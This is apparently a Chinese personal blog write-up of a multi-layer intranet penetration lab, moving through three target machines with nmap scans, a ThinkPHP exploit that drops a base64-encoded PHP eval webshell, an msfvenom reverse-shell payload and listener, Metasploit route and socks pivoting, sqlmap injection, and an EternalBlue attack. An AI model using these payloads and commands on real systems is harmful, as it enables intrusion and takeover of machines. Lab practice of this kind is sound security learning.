多重内网
2022第一篇文章 因为typora图片还得设置专门路径 图片有点多 所以就懒得上图片了
15号放假回家到现在一直摆烂 这篇文章其实是元旦的时候就在写 不过当时只打到了第二台 今天才接着之前的进度继续弄 等这几天约完hxd 真要好好学习了 一起加油叭!
teamssix.com的多重内网环境靶场
利用NAT连接本机的kali作为攻击机 已知目标机器第一台机器有两个网段 一个公网ip一个内网ip
以此公网ip作为突破点 打入内网
第一台机器
探测端口
nmap -T4 -sV 192.168.10.8
发现开了 80端口 那就可以从web入手 访问网址 是thinkphp5.0
888 phpMyadmin默认端口
8888 Linux宝塔面板默认端口
直接上exp写马 返回值发现 POST被拦 用Base64绕过
echo “<?php @eval($_POST['cmd']);?>” > shell.php
echo “xxxxxx”| base64 -d >shell.php
xxxxx = PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=
msf生成木马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.175.128 LPORT=6666
SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf > shell.elf
开启监听
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
show options
set lhost 0.0.0.0 不知道对方出网IP和网络状况
set lport xxxx
exploit
蚁剑上传
chomd 777 shell.elf 执行上线
配置路由
meterpreter > run get_local_subnets //获取网段
meterpreter > run autoroute -s 172.2.175.0/24 //添加路由
meterpreter > run autoroute -p //查看路由
meterpreter > run autoroute -d -s 172.2.175.0 //删除网段
meterpreter > run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24 //探测该网段下的存活主机。
meterpreter > background //后台sessions
内网代理
socks(可以search socks 查看相关语法)
use auxiliary/server/socks_proxy
show options -set VERSION 4
set SRVHOST xxx.xxx.xxx.xxx ?(设为攻击机ip)
exploit
vim /etc/proxychains4.conf 改socks ip
之后每一步都需要带上proxychains
第二台机器
开始第二台机器 继续先扫描端口
proxychains nmap -Pn -sT 192.168.22.128
同样存在宝塔
proxychains firefox 访问网址 也可以本机代理访问 sockscap
八哥 bagecms 查看robotx.txt 发现后台 没有弱口令
查看源代码 因为是靶场 提示存在有注入点
直接sqlmap梭哈 admin 123qwe
进入后台 先看模板 存在文件上传漏洞
一句话 蚁剑连接(需要代理proxychains 或者 代理软件)
第三台机器
重复之前步骤 生成msf马 开启监听 配置路由 内网带来
arp -a 发现存在另一网段 33
扫描端口 没有80 根据其他端口盲打exp
445 打永恒之蓝
ues exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set rhost 192.168.33.129
exploit
成功上线 拿下第三台
进程迁移
getpid 2084 查看当前会话进程
ps 查看当前进程 2084 powershell.exe
run post/windows/manage/migrate 利用msf后渗透模块
进程迁移到3000 notapad.exe cs可以用插件
chcp 65001 可以解决乱码问题
后面还有一系列端口转发等骚操作 震惊程度不亚于刚接触网安的我看别人用cs远控别人
但是因为不是很了解 就没有写了 下次一定 这内网的东西骚得很啊